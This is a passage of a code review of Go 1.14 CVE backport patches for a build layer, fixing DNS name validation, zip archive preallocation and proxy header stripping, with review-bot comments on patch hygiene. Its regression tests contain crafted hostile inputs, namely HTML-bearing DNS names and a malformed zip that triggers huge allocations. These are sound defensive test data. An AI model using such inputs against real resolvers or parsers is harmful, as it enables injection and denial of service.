++ t: []Token{start, bad, start.End()},
++ })
++ d.Strict = strict
++ err := d.Decode(&struct {
++ XMLName Name `xml:"test"`
++ }{})
++ if _, ok := err.(*SyntaxError); !ok {
++ t.Errorf("d.Decode: expected syntax error, got %v", err)
++ }
++ })
++ }
+ }
+
+ const testInput = `
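Review bot: The header of this patch gives a bare `Upstream-Status: Backport` with the upstream commit URL on a separate line above it, while most patches added in this commit use `Upstream-Status: Backport [URL]`; CVE-2020-29510.patch uses a third form, `Backport from URL`. The tag is what reviewers use to trace a backport to its origin, so I would normalise it here to `Upstream-Status: Backport [https://github.com/golang/go/commit/d0b79e3513a29628f3599dc8860666b6eed75372]` and drop the bare URL line.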
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
new file mode 100644
index 0000000000..afe4b0d2b8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
@@ -0,0 +1,38 @@
+From efb465ada003d23353a91ef930be408eb575dba6 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 17:40:12 +0530
+Subject: [PATCH] CVE-2021-31525
+
+Upstream-Status: Backport [https://github.com/argoheyard/lang-net/commit/701957006ef151feb43f86aa99c8a1f474f69282]
+CVE: CVE-2021-31525
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ src/vendor/golang.org/x/net/http/httpguts/httplex.go | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http/httpguts/httplex.go b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+index e7de24e..c79aa73 100644
+--- a/src/vendor/golang.org/x/net/http/httpguts/httplex.go
++++ b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+@@ -137,11 +137,13 @@ func trimOWS(x string) string {
+ // contains token amongst its comma-separated tokens, ASCII
+ // case-insensitively.
+ func headerValueContainsToken(v string, token string) bool {
+- v = trimOWS(v)
+- if comma := strings.IndexByte(v, ','); comma != -1 {
+- return tokenEqual(trimOWS(v[:comma]), token) || headerValueContainsToken(v[comma+1:], token)
++ for comma := strings.IndexByte(v, ','); comma != -1; comma = strings.IndexByte(v, ',') {
++ if tokenEqual(trimOWS(v[:comma]), token) {
++ return true
++ }
++ v = v[comma+1:]
+ }
+- return tokenEqual(v, token)
++ return tokenEqual(trimOWS(v), token)
+ }
+
+ // lowerASCII returns the ASCII lowercase version of b.
+--
+2.25.1
+
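Review bot: The `Upstream-Status` reference in this patch header points at `github.com/argoheyard/lang-net`, which appears to be a third-party copy rather than the golang.org/x/net repository that the vendored `httpguts/httplex.go` comes from. A security backport should cite the canonical upstream commit so the change can be compared against its origin, i.e. `Upstream-Status: Backport [<canonical golang.org/x/net commit URL>]`. The header also has only `CVE-2021-31525` as its subject and no description; one sentence saying that the recursion in `headerValueContainsToken` is replaced by a loop would tell a reader what is being fixed.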
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
new file mode 100644
index 0000000000..3d9de888ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
@@ -0,0 +1,373 @@
+From 9324d7e53151e9dfa4b25af994a28c2e0b11f729 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Thu, 27 May 2021 10:40:06 -0700
+Subject: [PATCH] net: verify results from Lookup* are valid domain names
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/31d60cda1f58b7558fc5725d2b9e4531655d980e]
+CVE: CVE-2021-33195
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+For the methods LookupCNAME, LookupSRV, LookupMX, LookupNS, and
+LookupAddr check that the returned domain names are in fact valid DNS
+names using the existing isDomainName function.
+
+Thanks to Philipp Jeitner and Haya Shulman from Fraunhofer SIT for
+reporting this issue.
+
+Updates #46241
+Fixes #46356
+Fixes CVE-2021-33195
+
+Change-Id: I47a4f58c031cb752f732e88bbdae7f819f0af4f3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323131
+Trust: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+(cherry picked from commit cdcd02842da7c004efd023881e3719105209c908)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323269
+---
+ src/net/dnsclient_unix_test.go | 157 +++++++++++++++++++++++++++++++++
+ src/net/lookup.go | 111 ++++++++++++++++++++---
+ 2 files changed, 255 insertions(+), 13 deletions(-)
+
+diff --git a/src/net/dnsclient_unix_test.go b/src/net/dnsclient_unix_test.go
+index 2ad40df..b8617d9 100644
+--- a/src/net/dnsclient_unix_test.go
++++ b/src/net/dnsclient_unix_test.go
+@@ -1800,3 +1800,160 @@ func TestPTRandNonPTR(t *testing.T) {
+ t.Errorf("names = %q; want %q", names, want)
+ }
+ }
++
++func TestCVE202133195(t *testing.T) {
++ fake := fakeDNSServer{
++ rh: func(n, _ string, q dnsmessage.Message, _ time.Time) (dnsmessage.Message, error) {
++ r := dnsmessage.Message{
++ Header: dnsmessage.Header{
++ ID: q.Header.ID,
++ Response: true,
++ RCode: dnsmessage.RCodeSuccess,
++ RecursionAvailable: true,
++ },
++ Questions: q.Questions,
++ }
++ switch q.Questions[0].Type {
++ case dnsmessage.TypeCNAME:
++ r.Answers = []dnsmessage.Resource{}
++ case dnsmessage.TypeA: // CNAME lookup uses a A/AAAA as a proxy
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeA,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.AResource{
++ A: TestAddr,
++ },
++ },
++ )
++ case dnsmessage.TypeSRV:
++ n := q.Questions[0].Name
++ if n.String() == "_hdr._tcp.golang.org." {
++ n = dnsmessage.MustNewName("<html>.golang.org.")
++ }
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: n,
++ Type: dnsmessage.TypeSRV,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.SRVResource{
++ Target: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypeMX:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeMX,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.MXResource{
++ MX: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypeNS:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeNS,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.NSResource{
++ NS: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypePTR:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypePTR,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.PTRResource{
++ PTR: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ }
++ return r, nil
++ },
++ }
++
++ r := Resolver{PreferGo: true, Dial: fake.DialContext}
++ // Change the default resolver to match our manipulated resolver
++ originalDefault := DefaultResolver
++ DefaultResolver = &r
++ defer func() {
++ DefaultResolver = originalDefault
++ }()
++
++ _, err := r.LookupCNAME(context.Background(), "golang.org")
++ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupCNAME("golang.org")
++ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, _, err = r.LookupSRV(context.Background(), "target", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, _, err = LookupSRV("target", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, _, err = r.LookupSRV(context.Background(), "hdr", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, _, err = LookupSRV("hdr", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupMX(context.Background(), "golang.org")
++ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupMX("golang.org")
++ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupNS(context.Background(), "golang.org")
++ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupNS("golang.org")
++ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupAddr(context.Background(), "1.2.3.4")
++ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupAddr("1.2.3.4")
++ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++}
+diff --git a/src/net/lookup.go b/src/net/lookup.go
+index 9cebd10..05e88e4 100644
+--- a/src/net/lookup.go
++++ b/src/net/lookup.go
+@@ -364,8 +364,11 @@ func (r *Resolver) LookupPort(ctx context.Context, network, service string) (por
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
+ func LookupCNAME(host string) (cname string, err error) {
+- return DefaultResolver.lookupCNAME(context.Background(), host)
++ return DefaultResolver.LookupCNAME(context.Background(), host)
+ }
+
+ // LookupCNAME returns the canonical name for the given host.
+@@ -378,8 +381,18 @@ func LookupCNAME(host string) (cname string, err error) {
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
+-func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string, err error) {
+- return r.lookupCNAME(ctx, host)
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
++func (r *Resolver) LookupCNAME(ctx context.Context, host string) (string, error) {
++ cname, err := r.lookupCNAME(ctx, host)
++ if err != nil {
++ return "", err
++ }
++ if !isDomainName(cname) {
++ return "", &DNSError{Err: "CNAME target is invalid", Name: host}
++ }
++ return cname, nil
+ }
+
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -391,8 +404,11 @@ func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string,
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err error) {
+- return DefaultResolver.lookupSRV(context.Background(), service, proto, name)
++ return DefaultResolver.LookupSRV(context.Background(), service, proto, name)
+ }
+
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -404,28 +420,82 @@ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err err
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
+-func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (cname string, addrs []*SRV, err error) {
+- return r.lookupSRV(ctx, service, proto, name)
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
++func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (string, []*SRV, error) {
++ cname, addrs, err := r.lookupSRV(ctx, service, proto, name)
++ if err != nil {
++ return "", nil, err
++ }
++ if cname != "" && !isDomainName(cname) {
++ return "", nil, &DNSError{Err: "SRV header name is invalid", Name: name}
++ }
++ for _, addr := range addrs {
++ if addr == nil {
++ continue
++ }
++ if !isDomainName(addr.Target) {
++ return "", nil, &DNSError{Err: "SRV target is invalid", Name: name}
++ }
++ }
++ return cname, addrs, nil
+ }
+
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupMX(name string) ([]*MX, error) {
+- return DefaultResolver.lookupMX(context.Background(), name)
++ return DefaultResolver.LookupMX(context.Background(), name)
+ }
+
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupMX(ctx context.Context, name string) ([]*MX, error) {
+- return r.lookupMX(ctx, name)
++ records, err := r.lookupMX(ctx, name)
++ if err != nil {
++ return nil, err
++ }
++ for _, mx := range records {
++ if mx == nil {
++ continue
++ }
++ if !isDomainName(mx.Host) {
++ return nil, &DNSError{Err: "MX target is invalid", Name: name}
++ }
++ }
++ return records, nil
+ }
+
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupNS(name string) ([]*NS, error) {
+- return DefaultResolver.lookupNS(context.Background(), name)
++ return DefaultResolver.LookupNS(context.Background(), name)
+ }
+
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupNS(ctx context.Context, name string) ([]*NS, error) {
+- return r.lookupNS(ctx, name)
++ records, err := r.lookupNS(ctx, name)
++ if err != nil {
++ return nil, err
++ }
++ for _, ns := range records {
++ if ns == nil {
++ continue
++ }
++ if !isDomainName(ns.Host) {
++ return nil, &DNSError{Err: "NS target is invalid", Name: name}
++ }
++ }
++ return records, nil
+ }
+
+ // LookupTXT returns the DNS TXT records for the given domain name.
+@@ -441,14 +511,29 @@ func (r *Resolver) LookupTXT(ctx context.Context, name string) ([]string, error)
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+ //
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++//
+ // When using the host C library resolver, at most one result will be
+ // returned. To bypass the host resolver, use a custom Resolver.
+ func LookupAddr(addr string) (names []string, err error) {
+- return DefaultResolver.lookupAddr(context.Background(), addr)
++ return DefaultResolver.LookupAddr(context.Background(), addr)
+ }
+
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+-func (r *Resolver) LookupAddr(ctx context.Context, addr string) (names []string, err error) {
+- return r.lookupAddr(ctx, addr)
++//
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++func (r *Resolver) LookupAddr(ctx context.Context, addr string) ([]string, error) {
++ names, err := r.lookupAddr(ctx, addr)
++ if err != nil {
++ return nil, err
++ }
++ for _, name := range names {
++ if !isDomainName(name) {
++ return nil, &DNSError{Err: "PTR target is invalid", Name: addr}
++ }
++ }
++ return names, nil
+ }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
new file mode 100644
index 0000000000..2e2dc62c49
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
@@ -0,0 +1,124 @@
+From 74242baa4136c7a9132a8ccd9881354442788c8c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Tue, 11 May 2021 11:31:31 -0700
+Subject: [PATCH] archive/zip: only preallocate File slice if reasonably sized
+
+Since the number of files in the EOCD record isn't validated, it isn't
+safe to preallocate Reader.Files using that field. A malformed archive
+can indicate it contains up to 1 << 128 - 1 files. We can still safely
+preallocate the slice by checking if the specified number of files in
+the archive is reasonable, given the size of the archive.
+
+Thanks to the OSS-Fuzz project for discovering this issue and to
+Emmanuel Odeke for reporting it.
+
+Fixes #46242
+Fixes CVE-2021-33196
+
+Change-Id: I3c76d8eec178468b380d87fdb4a3f2cb06f0ee76
+Reviewed-on: https://go-review.googlesource.com/c/go/+/318909
+Trust: Roland Shoemaker <roland@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Trust: Joe Tsai <thebrokentoaster@gmail.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Joe Tsai <thebrokentoaster@gmail.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33196
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/archive/zip/reader.go | 10 +++++-
+ src/archive/zip/reader_test.go | 59 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 68 insertions(+), 1 deletion(-)
+
+Index: go/src/archive/zip/reader.go
+===================================================================
+--- go.orig/src/archive/zip/reader.go
++++ go/src/archive/zip/reader.go
+@@ -84,7 +84,15 @@ func (z *Reader) init(r io.ReaderAt, siz
+ return err
+ }
+ z.r = r
+- z.File = make([]*File, 0, end.directoryRecords)
++ // Since the number of directory records is not validated, it is not
++ // safe to preallocate z.File without first checking that the specified
++ // number of files is reasonable, since a malformed archive may
++ // indicate it contains up to 1 << 128 - 1 files. Since each file has a
++ // header which will be _at least_ 30 bytes we can safely preallocate
++ // if (data size / 30) >= end.directoryRecords.
++ if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
++ z.File = make([]*File, 0, end.directoryRecords)
++ }
+ z.Comment = end.comment
+ rs := io.NewSectionReader(r, 0, size)
+ if _, err = rs.Seek(int64(end.directoryOffset), io.SeekStart); err != nil {
+Index: go/src/archive/zip/reader_test.go
+===================================================================
+--- go.orig/src/archive/zip/reader_test.go
++++ go/src/archive/zip/reader_test.go
+@@ -1070,3 +1070,62 @@ func TestIssue12449(t *testing.T) {
+ t.Errorf("Error reading the archive: %v", err)
+ }
+ }
++
++func TestCVE202133196(t *testing.T) {
++ // Archive that indicates it has 1 << 128 -1 files,
++ // this would previously cause a panic due to attempting
++ // to allocate a slice with 1 << 128 -1 elements.
++ data := []byte{
++ 0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x08, 0x08,
++ 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x02,
++ 0x03, 0x62, 0x61, 0x65, 0x03, 0x04, 0x00, 0x00,
++ 0xff, 0xff, 0x50, 0x4b, 0x07, 0x08, 0xbe, 0x20,
++ 0x5c, 0x6c, 0x09, 0x00, 0x00, 0x00, 0x03, 0x00,
++ 0x00, 0x00, 0x50, 0x4b, 0x01, 0x02, 0x14, 0x00,
++ 0x14, 0x00, 0x08, 0x08, 0x08, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0xbe, 0x20, 0x5c, 0x6c, 0x09, 0x00,
++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x01, 0x02, 0x03, 0x50, 0x4b, 0x06, 0x06, 0x2c,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d,
++ 0x00, 0x2d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0x31, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x06, 0x07, 0x00,
++ 0x00, 0x00, 0x00, 0x6b, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50,
++ 0x4b, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0xff,
++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0x00, 0x00,
++ }
++ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
++ if err != ErrFormat {
++ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
++ }
++
++ // Also check that an archive containing a handful of empty
++ // files doesn't cause an issue
++ b := bytes.NewBuffer(nil)
++ w := NewWriter(b)
++ for i := 0; i < 5; i++ {
++ _, err := w.Create("")
++ if err != nil {
++ t.Fatalf("Writer.Create failed: %s", err)
++ }
++ }
++ if err := w.Close(); err != nil {
++ t.Fatalf("Writer.Close failed: %s", err)
++ }
++ r, err := NewReader(bytes.NewReader(b.Bytes()), int64(b.Len()))
++ if err != nil {
++ t.Fatalf("NewReader failed: %s", err)
++ }
++ if len(r.File) != 5 {
++ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
++ }
++}
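Review bot: The preallocation guard added to reader.go, `(uint64(size)-end.directorySize)/30 >= end.directoryRecords`, subtracts two unsigned values without first checking that `end.directorySize` is no larger than the archive, so the difference can wrap and the record-count check stops bounding anything. This commit also adds CVE-2021-39293.patch, whose description covers exactly that overflow, so this file is only sound when both are applied, with 39293 after it. A sentence in the patch header such as `Depends on CVE-2021-39293.patch, which fixes an overflow in this check` would warn anyone cherry-picking this file alone. `Upstream-Status: Backport` here, and in CVE-2021-33197.patch, also omits the bracketed upstream commit link that CVE-2021-33198.patch gives. Reader.init starts and ends outside the inner hunk.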
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
new file mode 100644
index 0000000000..2052b1d3db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
@@ -0,0 +1,152 @@
+From cbd1ca84453fecf3825a6bb9f985823e8bc32b76 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Fri, 21 May 2021 14:02:30 -0400
+Subject: [PATCH] [release-branch.go1.15] net/http/httputil: always remove
+ hop-by-hop headers
+
+Previously, we'd fail to remove the Connection header from a request
+like this:
+
+ Connection:
+ Connection: x-header
+
+Updates #46313
+Fixes #46314
+Fixes CVE-2021-33197
+
+Change-Id: Ie3009e926ceecfa86dfa6bcc6fe14ff01086be7d
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321929
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Trust: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323091
+Run-TryBot: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33197
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/net/http/httputil/reverseproxy.go | 22 ++++----
+ src/net/http/httputil/reverseproxy_test.go | 63 +++++++++++++++++++++-
+ 2 files changed, 70 insertions(+), 15 deletions(-)
+
+Index: go/src/net/http/httputil/reverseproxy.go
+===================================================================
+--- go.orig/src/net/http/httputil/reverseproxy.go
++++ go/src/net/http/httputil/reverseproxy.go
+@@ -221,22 +221,18 @@ func (p *ReverseProxy) ServeHTTP(rw http
+ // important is "Connection" because we want a persistent
+ // connection, regardless of what the client sent to us.
+ for _, h := range hopHeaders {
+- hv := outreq.Header.Get(h)
+- if hv == "" {
+- continue
+- }
+- if h == "Te" && hv == "trailers" {
+- // Issue 21096: tell backend applications that
+- // care about trailer support that we support
+- // trailers. (We do, but we don't go out of
+- // our way to advertise that unless the
+- // incoming client request thought it was
+- // worth mentioning)
+- continue
+- }
+ outreq.Header.Del(h)
+ }
+
++ // Issue 21096: tell backend applications that care about trailer support
++ // that we support trailers. (We do, but we don't go out of our way to
++ // advertise that unless the incoming client request thought it was worth
++ // mentioning.) Note that we look at req.Header, not outreq.Header, since
++ // the latter has passed through removeConnectionHeaders.
++ if httpguts.HeaderValuesContainsToken(req.Header["Te"], "trailers") {
++ outreq.Header.Set("Te", "trailers")
++ }
++
+ // After stripping all the hop-by-hop connection headers above, add back any
+ // necessary for protocol upgrades, such as for websockets.
+ if reqUpType != "" {
+Index: go/src/net/http/httputil/reverseproxy_test.go
+===================================================================
+--- go.orig/src/net/http/httputil/reverseproxy_test.go
++++ go/src/net/http/httputil/reverseproxy_test.go
+@@ -91,8 +91,9 @@ func TestReverseProxy(t *testing.T) {
+
+ getReq, _ := http.NewRequest("GET", frontend.URL, nil)
+ getReq.Host = "some-name"
+- getReq.Header.Set("Connection", "close")
+- getReq.Header.Set("Te", "trailers")
++ getReq.Header.Set("Connection", "close, TE")
++ getReq.Header.Add("Te", "foo")
++ getReq.Header.Add("Te", "bar, trailers")
+ getReq.Header.Set("Proxy-Connection", "should be deleted")
+ getReq.Header.Set("Upgrade", "foo")
+ getReq.Close = true
+@@ -236,6 +237,64 @@ func TestReverseProxyStripHeadersPresent
+ }
+ }
+
++func TestReverseProxyStripEmptyConnection(t *testing.T) {
++ // See Issue 46313.
++ const backendResponse = "I am the backend"
++
++ // someConnHeader is some arbitrary header to be declared as a hop-by-hop header
++ // in the Request's Connection header.
++ const someConnHeader = "X-Some-Conn-Header"
++
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ if c := r.Header.Values("Connection"); len(c) != 0 {
++ t.Errorf("handler got header %q = %v; want empty", "Connection", c)
++ }
++ if c := r.Header.Get(someConnHeader); c != "" {
++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
++ }
++ w.Header().Add("Connection", "")
++ w.Header().Add("Connection", someConnHeader)
++ w.Header().Set(someConnHeader, "should be deleted")
++ io.WriteString(w, backendResponse)
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := NewSingleHostReverseProxy(backendURL)
++ frontend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ proxyHandler.ServeHTTP(w, r)
++ if c := r.Header.Get(someConnHeader); c != "should be deleted" {
++ t.Errorf("handler modified header %q = %q; want %q", someConnHeader, c, "should be deleted")
++ }
++ }))
++ defer frontend.Close()
++
++ getReq, _ := http.NewRequest("GET", frontend.URL, nil)
++ getReq.Header.Add("Connection", "")
++ getReq.Header.Add("Connection", someConnHeader)
++ getReq.Header.Set(someConnHeader, "should be deleted")
++ res, err := frontend.Client().Do(getReq)
++ if err != nil {
++ t.Fatalf("Get: %v", err)
++ }
++ defer res.Body.Close()
++ bodyBytes, err := ioutil.ReadAll(res.Body)
++ if err != nil {
++ t.Fatalf("reading body: %v", err)
++ }
++ if got, want := string(bodyBytes), backendResponse; got != want {
++ t.Errorf("got body %q; want %q", got, want)
++ }
++ if c := res.Header.Get("Connection"); c != "" {
++ t.Errorf("handler got header %q = %q; want empty", "Connection", c)
++ }
++ if c := res.Header.Get(someConnHeader); c != "" {
++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
++ }
++}
++
+ func TestXForwardedFor(t *testing.T) {
+ const prevForwardedFor = "client ip"
+ const backendResponse = "I am the backend"
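Review bot: The last two assertions in TestReverseProxyStripEmptyConnection inspect `res.Header`, which is what the client received through the proxy, but they report `handler got header …`, the same wording as the backend-side checks. A failure therefore does not say in which direction the hop-by-hop header leaked; `t.Errorf("response got header %q = %q; want empty", someConnHeader, c)` would tell them apart. The patch subject names release-branch.go1.15 while the recipe directory is go-1.14, and the reverseproxy.go hunk calls `httpguts.HeaderValuesContainsToken` without adding an import. It is worth confirming that `httpguts` is already imported in the 1.14 file, which the hunk does not show.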
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
new file mode 100644
index 0000000000..241c08dad7
--- /dev/null
